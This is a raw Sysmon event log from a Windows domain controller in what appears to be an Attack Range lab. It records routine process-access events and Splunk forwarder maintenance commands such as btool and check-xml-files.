13:34:19.564{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5900-00000000A301}3840C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5900-00000000A301}3840C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.564{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5B-6005-5900-00000000A301}3840C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.575{59A5CD1D-8E5B-6005-5900-00000000A301}3840C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.548{59A5CD1D-8E5B-6005-5800-00000000A301}38963864C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5800-00000000A301}3896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5800-00000000A301}3896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E5B-6005-5700-00000000A301}37283104C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E5B-6005-5800-00000000A301}3896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.311{59A5CD1D-8E5B-6005-5800-00000000A301}3896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E5B-6005-5700-00000000A301}3728C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000002065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.298{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5700-00000000A301}3728C:\Program 